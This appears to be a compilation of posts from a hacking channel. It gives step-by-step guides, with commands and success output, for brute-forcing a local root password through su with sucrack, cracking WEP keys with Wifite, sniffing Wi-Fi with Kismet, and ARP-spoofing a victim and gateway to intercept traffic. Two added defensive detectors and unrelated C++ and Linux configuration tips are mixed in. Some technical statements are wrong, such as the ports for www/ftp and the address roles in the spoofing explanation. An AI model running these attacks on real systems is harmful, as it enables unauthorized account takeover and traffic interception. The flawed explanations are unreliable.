UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Cracking the password of any local user (Kali, Parrot):
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Physical access attacks are similar to elevating a user's rights.

2) That is, once an ordinary user has logged in to the system, the passwords of other local user accounts are cracked.

3) In Linux, an ordinary user can perform certain operations on behalf of other users through the su command, which means that the user can elevate their permissions on Linux/Unix systems.

4) In this case, the SUCrack tool can be used to brute-force the password of a local user account through su, to complete subsequent penetration attacks.

5) This section introduces using the SUCrack tool to attack such a user.
SUCrack is a multi-threaded tool that allows users to brute-force the password of a local user account using su. Several commonly used options of this tool are shown below:

--help: View SUCrack's help file.

-l: Change the user whose login is attacked.

-s: Set the interval for displaying statistics. The default is 3 seconds.

-a: Set whether to use ANSI escape codes.

-w: Set the number of threads SUCrack runs. Because SUCrack is multi-threaded, users can specify the number of threads they want to run. It is recommended to use only one, because after each failed login attempt the connection is retried after a delay of 3 seconds.

[Example 8-8] Use SUCrack to crack the password of a local user. When using the sucrack command, you need to specify a password file. Otherwise, you will get a funny prompt message. The execution command is as follows:

$ sucrack /usr/share/wordlists/wordlist.txt
password is: 123456

6) As you can see from the output, the password of the local user root is 123456. Because the su command is used, the root user is the default when no user is specified.

7) Therefore, after executing the above command, the password of the root user is cracked.

8) To run two threads, display statistics every 6 seconds and use ANSI escape codes, the execution command is as follows:

$ sucrack -w 2 -s 6 -a /usr/share/wordlists/wordlist.txt

Written by UndercOde
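
On the defending side, every failed su attempt leaves a pam_unix authentication-failure record, so the guessing described above appears as a burst of failures from one account against one target user. The detector below is an added example, not part of the original post; the log lines are constructed in the pam_unix style, and the threshold, window and year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# pam_unix failure record written for su, for example:
#   "... su[2231]: pam_unix(su:auth): authentication failure; ... ruser=alice rhost=  user=root"
FAIL_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2}\s\d{2}:\d{2}:\d{2})\s.*"
    r"pam_unix\(su(?:-l)?:auth\): authentication failure;"
    r".*\bruser=(?P<ruser>\S*)\s.*\buser=(?P<user>\S+)"
)


def constructed_sample():
    """Constructed auth.log lines: six su failures by alice 3 s apart, one by bob."""
    fmt = ("{ts} host su[{pid}]: pam_unix(su:auth): authentication failure; "
           "logname={who} uid=1000 euid=0 tty=/dev/pts/1 ruser={who} rhost=  user=root")
    start = datetime(2014, 7, 23, 17, 19, 48)
    lines = [
        fmt.format(ts=(start + timedelta(seconds=3 * i)).strftime("%b %d %H:%M:%S"),
                   pid=2231 + i, who="alice")
        for i in range(6)
    ]
    # One isolated failure by another user, placed in chronological order.
    lines.insert(2, fmt.format(ts="Jul 23 17:19:53", pid=2290, who="bob"))
    # A non-failure record that the detector must ignore.
    lines.append("Jul 23 17:21:10 host su[2301]: pam_unix(su:session): "
                 "session opened for user root by alice(uid=1000)")
    return lines


def detect_su_bruteforce(lines, threshold=5, window_s=60, year=2014):
    """Return {(invoking_user, target_user): peak failures inside the window}.

    Only pairs that reach `threshold` failures within `window_s` seconds are
    reported. syslog timestamps carry no year, so `year` is supplied (assumption).
    """
    recent = defaultdict(deque)   # (ruser, user) -> timestamps inside the window
    alerts = {}
    for line in lines:
        m = FAIL_RE.search(line)
        if not m:
            continue
        when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ruser"], m["user"])
        q = recent[key]
        q.append(when)
        # Drop failures that have fallen out of the sliding window.
        while (when - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(q))
    return alerts


if __name__ == "__main__":
    for (ruser, user), count in detect_su_bruteforce(constructed_sample()).items():
        print(f"{ruser} -> {user}: {count} failed su attempts within the window")
```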
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Wireless Wi-Fi attack: Kali, Parrot, Debian, Ubuntu (also rooted Android)
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Wireless sniffing tool Kismet: guide by Underc0de

> If you want to perform a wireless network penetration test, you must first scan for all valid wireless access points. Kali Linux provides Kismet, a wireless network sniffing tool. Use it to measure the surrounding wireless signals and see all available wireless access points. This section introduces sniffing wireless networks with Kismet.


1) Start the Kismet tool. The execution command is as follows:

root@kali:~# kismet

2) Terminal extension

> This interface sets whether to use the terminal's default colors. Because Kismet's default color is gray, it may not display on some terminals. Use the default colors here: select Yes, and the next interface is shown.

3) The interface warns that Kismet is running as the root user. Select OK, and the next interface is shown.

4) The interface asks whether to start the Kismet service automatically. Select Yes, and the next interface is shown.

5) This interface displays settings for the Kismet service. Use the default settings and select Start, and the next interface is shown.

6) This interface reports that no packet sources have been defined and asks whether to add one now. Select Yes, and the next interface is shown.

7) On this interface, specify the wireless network card interface and a description. In Intf, enter the wireless network card interface. If the card is already in monitor mode, you can enter wlan0 or mon0. The other fields can be left empty. Then click the Add button.

8) Select the Close Console Window button on this interface, and the next interface is displayed.

9) This interface shows that Kismet is sniffing the signals of the wireless networks. After it has run for a while, stop the capture: click the Kismet menu on this interface and select the Quit command.

10) After pressing the Quit command

11) Stop the Kismet service
Click Kill on this interface to stop the Kismet service and exit terminal mode. The terminal then displays some log information.

12) In the KISMET IS SHUTTING DOWN section you will see that several log files are closed.

> These log files are stored in the /root/ directory by default. The log files show the time at which they were generated; these times are very helpful when Kismet is run many times or over several days.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to analyze the packets captured by Kismet?
instagram.com/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Analyze the data captured above:


1) Change to the /root/ directory and use the ls command to view the log files generated above. The execution command is as follows:

root@kali:~# ls Kismet-20140723-17-19-48-1.*
Kismet-20140723-17-19-48-1.alert Kismet-20140723-17-19-48-1.netxml
Kismet-20140723-17-19-48-1.gpsxml Kismet-20140723-17-19-48-1.pcapdump
Kismet-20140723-17-19-48-1.nettxt

2) From the output, you can see that there are five log files with different suffixes. All information generated by the Kismet tool is stored in these files. Their formats are described below.

alert: This file includes all warning messages.

gpsxml: If a GPS source is used, the relevant GPS data is saved in this file.

nettxt: Includes all collected information as text output.

netxml: Includes all data in XML format.

pcapdump: Includes the packets captured throughout the session.

The following mainly covers tools for working with the PCAP and text files.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Analyze the PCAP signal frames using Wireshark (rooted Android requires an external Wi-Fi adapter)

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Start Wireshark. The execution command is as follows:
root@kali:~# wireshark &

2) Open the pcapdump file. Select the File | Open command in the menu bar of the Wireshark interface.

Selecting the captured pcapdump file
3) Select the pcapdump file captured by the Kismet tool on this interface, and then click the "Open" button.

> pcapdump file data packet1

4) From this interface, you can see all the wireless network packets captured by Kismet. A Beacon is a basic management frame of wireless devices and is used to signal other devices.

🦑 Analyze Kismet's Text File

1) In Linux, you can use any text editor to open the nettxt file, or use the cat command to view its contents. Open the nettxt file with the default Linux text editor.

2) nettxt file content

> From this interface, you can see that the nettxt file contains a lot of information and lists each wireless network that was scanned.

> > Each wireless network has a label and lists each client connected to it.

3) Client Information
From this interface, you can see a Client1 whose MAC address is 00:c1:40:76:05:6c. It indicates that a client with the MAC address 00:c1:40:76:05:6c is connected to a wireless access point (example).

Well done !
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Using Wifite to Crack Wireless Networks (Kali, Parrot, Debian, Ubuntu, Wifislax)

Some programs for cracking wireless networks build on the Aircrack-ng toolset and add a graphical interface or a text menu. This makes them easier to use, with no commands to remember. In this section, we use the command-line tool Wifite to scan and attack wireless networks.

1) Start wifite. The execution command is as follows:

302-01

2) Stop scanning the wireless networks, and the following message is displayed:

> 302-02
From the above information, you can see that 13 wireless access points were scanned in this example.

3) Select the target of the attack. Here a wireless access point that is encrypted using WEP is selected, so it should be relatively easy to attack, as shown below:

[+] select target numbers (1-13) separated by commas, or 'all': 2

[+] 1 target selected.

[0:10:00] preparing attack "Test" (14:E6:E4:AC:FB:20)

[0:10:00] attempting fake authentication (5/5)… failed

[0:10:00] attacking "Test" via arp-replay attack

[0:09:06] started cracking (over 10000 ivs)

[0:09:00] captured 12492 ivs @ 418 iv/sec

[0:09:00] cracked Test (14:E6:E4:AC:FB:20)! key: "6162636465"

[+] 1 attack completed:

[+] 1/1 WEP attacks succeeded

cracked Test (14:E6:E4:AC:FB:20), key: "6162636465"

[+] disabling monitor mode on mon0… done

[+] quitting

🦑 From the output above, you can see that the attack was successful: the password of the Test wireless access point is 6162636465.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Attack router (full)
The tools introduced earlier connect to the wireless network by cracking its password directly.

> Of all the devices in a wireless network environment, the router is one of the most important. To protect the router, users usually set a more complex password.

> Some users may even keep the router's default username and password. However, the router itself has some vulnerabilities, and a complex password is not easy to attack directly.

> In that case, the vulnerabilities in the router itself can be used to carry out the attack. This section introduces router attacks using the Routerpwn tool.

> Routerpwn is probably the easiest tool to use. It is used to look for vulnerabilities in routers. Routerpwn is not included in Kali; it is just a website. Its official website address is http://routerpwn.com/
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Arpspoof tool

1) Arpspoof is a very good open-source program for ARP spoofing. Its operation does not affect the communication of the entire network; the tool achieves the deception by replacing data in transit. This section introduces the use of the Arpspoof tool.

2) URL Traffic Manipulation Attack
URL traffic manipulation is very similar to a man-in-the-middle attack: the traffic of the target host is routed through the attacker on its way to the Internet. This is done through ARP injection.

3) This section introduces the use of the Arpspoof tool to implement URL traffic manipulation attacks. The specific steps are as follows:

a) Turn on routing and forwarding. The execution command is as follows:

root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
After executing the above command, no information is output.

b) Start Arpspoof injection to attack the target system. The attacker (192.168.6.102) sends ARP packets to spoof the gateway (192.168.6.1) and the target system (192.168.6.101). The target system is deceived first; the execution command is as follows:

root@kali:~# arpspoof -i eth0 -t 192.168.6.101 192.168.6.1
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d

c) The output shows a packet sent by the attacker to the target host 192.168.6.102. 50:e5:49:eb:46:8d is the attacker's MAC address; 0:19:21:3f:c3:e5 is the MAC address of 192.168.6.101. Once this succeeds, whenever the target host 192.168.6.101 sends data to the gateway 192.168.6.1, the data is sent to the attacker 192.168.6.102.

d) Use Arpspoof to attack the gateway. The execution command is as follows:

root@kali:~# arpspoof -i eth0 -t 192.168.6.1 192.168.6.101
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d
50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d

e) The output shows the packets sent by the attacker to the gateway 192.168.6.
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to verify the Arpspoof attack using a Wireshark packet capture.
The specific steps are shown below.
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Start the Wireshark tool. On the Kali Linux desktop, select "Applications" | Kali Linux | Top 10 Security Tools | wireshark in order. The interface will be displayed.

2) Wireshark startup interface
Under Start on this interface, select the interface to capture on. Select eth0 here, and then click the Start button.

3) On this interface you can change Wireshark settings and start, stop and refresh the packet capture.

4) Ping the gateway 192.168.6.1 from the target system 192.168.6.101. The execution command is as follows:

C:\Users\Administrator>ping 192.168.6.1

5) Captured packets

> This interface shows the data transmission between 192.168.6.101 and 192.168.6.1.

> The packets of the whole exchange are numbered 28-33: 28-30 are the request and 31-33 are the target's response. The captured packets are analyzed in detail below:

28: indicates that 192.168.6.101 (source) sends a ping request to 192.168.6.1 (destination).

29: indicates that 192.168.6.102 forwards the data packet of 192.168.6.101.

30: indicates that 192.168.6.102 forwards the data packet and then sends a request to 192.168.6.1.

31: The target host 192.168.6.1 responds to the request of 192.168.6.101.

32: indicates that the response was sent to 192.168.6.102, and the host

33: The destination host 192.168.6.1 sends the forwarded data to 192.168.6.101.

E N J O Y BY U N D E R C OD E

Written by UndercOde
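
The forged replies in the Arpspoof output above have a recognizable signature for a defender: the MAC address claimed for an IP changes, and one MAC ends up claiming both the gateway and a host. The monitor below is an added example, not part of the original post; it parses "reply IP is-at MAC" lines in the format printed above and in tcpdump's format, and the sample lines are constructed from the addresses used on this page.

```python
import re
from collections import defaultdict

# Matches "arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d" (format shown above)
# and tcpdump's "ARP, Reply 192.168.6.1 is-at 14:e6:e4:ac:fb:20, length 28".
REPLY_RE = re.compile(
    r"reply\s+(\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+"
    r"([0-9a-f]{1,2}(?::[0-9a-f]{1,2}){5})",
    re.IGNORECASE,
)

# Constructed sample: two legitimate replies, then forged ones.
SAMPLE_LINES = [
    "17:19:40.100 ARP, Reply 192.168.6.1 is-at 14:e6:e4:ac:fb:20, length 28",
    "17:19:41.200 ARP, Reply 192.168.6.101 is-at 00:19:21:3f:c3:e5, length 28",
    "50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d",
    "50:e5:49:eb:46:8d 0:19:21:3f:c3:e5 0806 42: arp reply 192.168.6.1 is-at 50:e5:49:eb:46:8d",
    "50:e5:49:eb:46:8d 14:e6:e4:ac:fb:20 0806 42: arp reply 192.168.6.101 is-at 50:e5:49:eb:46:8d",
]


def norm_mac(mac):
    """Zero-pad each octet so '0:19:21:3f:c3:e5' equals '00:19:21:3f:c3:e5'."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))


def find_arp_conflicts(lines, trusted=None):
    """Return (changed, shared).

    changed: list of (ip, previous_mac, new_mac) whenever an IP's claimed MAC changes.
    shared:  {mac: [ips]} for every MAC that claims more than one IP.
    `trusted` optionally seeds known-good ip -> mac bindings (e.g. the gateway).
    """
    bindings = {ip: norm_mac(mac) for ip, mac in (trusted or {}).items()}
    owners = defaultdict(set)
    for ip, mac in bindings.items():
        owners[mac].add(ip)
    changed = []
    for line in lines:
        m = REPLY_RE.search(line)
        if not m:
            continue
        ip, mac = m.group(1), norm_mac(m.group(2))
        previous = bindings.get(ip)
        if previous is not None and previous != mac:
            event = (ip, previous, mac)
            if event not in changed:      # report each distinct change once
                changed.append(event)
        bindings[ip] = mac
        owners[mac].add(ip)
    shared = {mac: sorted(ips) for mac, ips in owners.items() if len(ips) > 1}
    return changed, shared


if __name__ == "__main__":
    changed, shared = find_arp_conflicts(SAMPLE_LINES)
    for ip, old, new in changed:
        print(f"binding changed: {ip} was {old}, now claimed by {new}")
    for mac, ips in shared.items():
        print(f"{mac} claims several addresses: {', '.join(ips)}")
```

A static ARP entry for the gateway on hosts, or Dynamic ARP Inspection on managed switches, keeps forged replies like these from taking effect.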
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Now you are able to attack and analyse Wireshark and Kismet packets, and to spoof and collect data from a victim
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Programming Techniques: Auto Jump
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Make the page /index.html jump to /its/index.html immediately after it loads. The content of /index.html is as follows:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta http-equiv="refresh" content="0; url=/its">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<a href="http://192.168.18.235/its">Loading ...</a>
</body>
</html>
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Programming Techniques: Cross-platform Code Debugging by Underc0de :
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) In development, for the sake of code reuse, we always separate the core algorithm from the interface part. The core algorithm is generally written in C, and we hope that the code can be compiled and run on other platforms.

2) There is VC on the Microsoft platform, and gcc on Unix and some embedded platforms (Palm ...). If the code is written first and ported afterwards, it is uncomfortable enough; it is best to support both while writing the code. If you work in a company, you may have several machines, one with Windows 2000 and one with Linux, and the code has to be copied across, or you use a server over Telnet.

3) If there is only one computer, it is miserable: install two operating systems, restart, switch operating system.

🦑 Here is a piece of software that solves this problem: under Windows, the same source code is compiled and debugged with VC and gcc at the same time. It is cygwin. I use VC and gcc.

1) Install cygwin
First install cygwin. Cygwin is a cygnus.com product. Download it from its website and install it directly over the Internet. Don't forget to select the gcc option during installation.

2) Code directory
My code directory is ZCore, with subdirectories below it. The subdirectory Build contains two subdirectories, VC and gcc, which hold the VC project files and the gcc Makefile respectively; the subdirectory Src is the code directory; the subdirectory Doc holds the Readme and other instructions (I am not used to Chinese comments in English code). The code is to be compiled into a static library. The VC build environment needs no explanation, so let's see how to set up a gcc build environment. The Makefile has to be written by hand; there is no Makefile helper tool in my cygwin. Run cygwin.

3) Mapping the directory
We first mount the win32 directory into the POSIX directory tree; run mount to view the paths already mounted. The path of my ZCore is d:\study\zcore and I want to map it to /zcore; the command is "mount d:/study/zcore /zcore". There is a warning, but no problem. Now mount shows one more entry. This information is stored in the registry under
[HKEY_CURRENT_USER\Software\Cygnus Solutions\Cygwin\mounts v2\/zcore]
To unmount, use the command "umount /zcore".

4) Compile with gcc
Use "cd /zcore/build/gcc" to enter the build directory, then run make.

In this way, you can compile with both VC and gcc while debugging the code, and it will be easier to migrate to other environments in the future.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Programming Techniques: Defining Function Objects (full) by UndercOde :
fb.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Although function pointers are widely used to implement callbacks, C++ also provides another important way to implement them: the function object. Function objects (also called "functors") are ordinary class objects that overload the "()" operator. So syntactically, function objects behave like ordinary functions.

🦑 There are several advantages to using function objects instead of function pointers.

1) First, because an object can be modified internally without changing its external interface, the design is more flexible. Function objects can also have data members that store the results of previous calls. With ordinary functions, the results of previous calls have to be stored in global or local static variables, and such variables have drawbacks that we would rather avoid.

2) Second, the compiler can inline calls to function objects, which further improves performance. This is almost impossible to achieve with function pointers.

The following example illustrates how to define and use function objects. First, declare a normal class and overload the "()" operator:

class Negate
{
public:
    // const, so that it can be called on temporaries and const references
    int operator()(int n) const { return -n; }
};

In the overloaded operator declaration, remember that the first pair of parentheses is always empty, because it is part of the overloaded operator's name; the second pair of parentheses is the parameter list. Generally, when overloading an operator, the number of parameters is fixed, but the "()" operator is different: it can have any number of parameters.

Because the built-in operation in Negate is unary (only one operand), the overloaded "()" operator also has only one parameter. The return type is the same as the parameter type, in this case int. The function returns an integer with the opposite sign to its argument.

🦑 Using Function Objects

We now define a function called Callback() to test the function object. Callback() takes two parameters: an int and a reference to the class Negate. Callback() treats the function object neg as a normal function name:

#include <iostream>
using std::cout;

// Takes a const reference so that a temporary Negate can be passed
void Callback(int n, const Negate & neg)
{
    int val = neg(n); // call the overloaded operator "()"
    cout << val;
}

In the above code, note that neg is an object, not a function. The compiler translates the statement

int val = neg(n);

into

int val = neg.operator()(n);

Generally, function objects do not define constructors and destructors, so no problems occur during creation and destruction. As mentioned earlier, the compiler can inline the overloaded operator code, which avoids the runtime cost of a function call.

To complete the above example, we use the main function main() to supply the arguments of Callback():

int main()
{
    Callback(5, Negate()); // outputs -5
}

This example passes the integer 5 and a temporary Negate object to Callback(), and the program outputs -5.

Template function object

As can be seen from the above example, its data type is limited to int, whereas generality is one of the advantages of function objects. How do we create a generic function object? The method is to use a template, i.e. the overloaded operator "()" is defined as a member template, so that the function object suits any data type: double, __int64 or char:

#include <iostream>
using std::cout;

class GenericNegate
{
public:
    template <class T> T operator()(T t) const { return -t; }
};

int main()
{
    GenericNegate negate;
    cout << negate(5.3333);         // double
    cout << negate(10000000000LL);  // long long (__int64, written 10000000000i64, in VC)
}

With an ordinary callback function, it is quite difficult to achieve this flexibility.

Function Objects in the Standard Library

The C++ Standard Library defines several useful function objects that can be passed to STL algorithms. For example, the sort() algorithm takes a predicate object as its third parameter. A predicate object is a templated function object that returns a Boolean result. You can pass greater<> or less<> to sort() to force a descending or ascending sort order:

#include <functional> // for greater<> and less<>
#include <algorithm>  // for sort()
#include <vector>
using namespace std;

int main()
{
    vector<int> vi;
    // .. fill the vector
    sort(vi.begin(), vi.end(), greater<int>()); // descending
    sort(vi.begin(), vi.end(), less<int>());    // ascending
}

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Programming Techniques: Finding Related Library Files for a Command by Underc0de :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) When making your own distribution, you often need to determine which library files a command requires, to ensure that the command can run reliably on a separate system.

2) In the Linux environment, this can be done with the ldd command. Executing
ldd /bin/ls
on the console gives a list of the library files related to the /bin/ls command.

3) Query which library files a command uses

For example, to know which library files ls uses, you can run:
$ ldd /bin/ls
The output is shown below (Red Hat as an example):

libtermcap.so.2 => /lib/libtermcap.so.2 (0x40019000)
libc.so.6 => /lib/i686/libc.so.6 (0x42000000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Some small programming tips by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Speed Optimization: Detailed Network Configuration Files for Tuning Linux Network Performance, FULL by Underc0de
PART 1
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) In "Debugging Tools for Tuning Linux Network Performance", we introduced three network tuning and test tools, route, netstat and tcpdump, and the functions they provide. In this article, we focus on the contents of the network configuration files to help you understand these files.

> /etc/modules.conf file

2) This configuration file defines the parameters of the various modules that need to be loaded at startup. Here we focus on the configuration of network cards.

3) To reduce possible problems during startup, the Linux kernel does not automatically detect multiple network cards. For a system that does not compile the network card driver into the kernel but loads it dynamically as a module, if you need to install multiple network cards you should configure them in the "modules.conf" file.

4) If the device driver is compiled as a module (kernel module): for PCI devices, the module automatically detects all devices installed in the system; for ISA cards, you need to give the module an IO address so that it knows where to look for the card. This information is provided in "/etc/conf.modules".

5) For example, we have two 3c509 cards on the ISA bus. One IO address is 0x300 and the other is 0x320. Edit the "modules.conf" file as follows:

alias eth0 3c509
alias eth1 3c509
options 3c509 io=0x300,0x320

6) For PCI cards, you only need the alias command to associate ethN with the appropriate driver module name; the IO address of the PCI card is detected automatically. For PCI cards, edit the "modules.conf" file as follows:

alias eth0 3c905
alias eth1 3c905
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Speed Optimization: Detailed Network Configuration Files for Tuning Linux Network Performance, FULL by Underc0de PART 2
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) If the driver has been compiled into the kernel: the PCI probe at system startup automatically finds all relevant network cards. ISA cards can also be detected automatically, but in some cases an ISA card still needs the following configuration: add configuration information to "/etc/lilo.conf", so that LILO passes it to the kernel as boot parameters. For ISA cards, edit the "lilo.conf" file and add the following:

append="ether=0,0,eth0 ether=0,0,eth1"

/etc/sysconfig/network-scripts/ifcfg-ethN files

2) In RedHat, the configuration files of the system's network devices are saved in the "/etc/sysconfig/network-scripts" directory: ifcfg-eth0 contains the configuration of the first network card, ifcfg-eth1 contains the configuration of the second network card, and so on.

3) To change the network address manually or add a new network interface, modify the corresponding file (ifcfg-ethN) or create a new one.

DEVICE=name      name is the name of the physical device
IPADDR=addr      addr is the IP address assigned to the card
NETMASK=mask     mask is the network mask
NETWORK=addr     addr is the network address
BROADCAST=addr   addr is the broadcast address
ONBOOT=yes/no    whether to activate the card at startup
BOOTPROTO=proto  proto is one of the following:

none: no boot-time protocol is used

bootp: use the bootp protocol

dhcp: use the dhcp protocol

USERCTL=yes/no   whether non-root users are allowed to control the device

/etc/resolv.conf file

4) This file is the configuration file of the domain name resolver (the resolver is a library that resolves host names to IP addresses). An example is as follows:

search domainname.com
nameserver 208.164.186.1
nameserver 208.164.186.2
Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 PART 3 Speed Optimization: Detailed Network Configuration Files for Tuning Linux Network Performance, FULL by Underc0de
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) "search domainname.com" means that when a host name is given without the full domain name, the suffix domainname.com is appended to the host name; "nameserver" means that the host at this address is used as the name server when resolving domain names. The name servers are queried in the order in which they appear in the file.

/etc/host.conf file

2) This file specifies how host names are resolved. Linux uses the resolver library to obtain the IP address corresponding to a host name. The following is an example of "/etc/host.conf":

order bind,hosts
multi on
nospoof on

3) "order bind,hosts" specifies the order of host name lookups. Here DNS is used first to resolve the name, and then the "/etc/hosts" file (the order can also be the other way round).

4) "multi on" specifies whether a host listed in the "/etc/hosts" file can have multiple addresses; hosts with multiple IP addresses are generally called multi-homed hosts.

5) "nospoof on" means that IP address spoofing is not allowed for this server. IP spoofing is a means of attacking the security of the system: by masquerading its IP address as that of another computer, an attacker gains the trust of other computers.

/etc/hosts file

6) When the machine starts, before it can query DNS, it needs to look up some host name to IP address mappings. These mappings are stored in the /etc/hosts file. In the absence of a domain name server, all network programs on the system query this file to resolve the IP address corresponding to a host name.

> The following is an example of an "/etc/hosts" file:

IP Address      Hostname            Alias
127.0.0.1       Localhost           Gate.openarch.com
208.164.186.1   gate.openarch.com   Gate
............

7) The leftmost column is the host's IP address. The middle column is the host name. Any subsequent columns are aliases for that host. Once the machine's network configuration files are set up, the network should be restarted for the changes to take effect. Use the following command to restart the network: /etc/rc.d/init.d/network restart.

/etc/inetd.conf file

8) As we all know, the more service ports a server has open, the more difficult it is to ensure system security and stability. Therefore, a server providing specific services should open only the ports it needs, and services unrelated to its role should be closed. For example, a machine that serves as the www and ftp server should only open ports 80 and 25. Other unrelated services such as finger and auth are turned off to reduce system vulnerabilities.

Written by UndercOde
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

🦑 PART 4 Speed Optimization - Detailed Network Configuration File for Tuning Linux Network Performance FULL by Underc0de

1) inetd, also known as the "super server", is a daemon that listens for network requests and calls the corresponding service process to handle each connection request. inetd.conf is the configuration file for inetd.

2) The inetd.conf file tells inetd which network ports to listen on and which service to start for each port. The first thing to do with a Linux system in any network environment is to understand what services the server will provide.

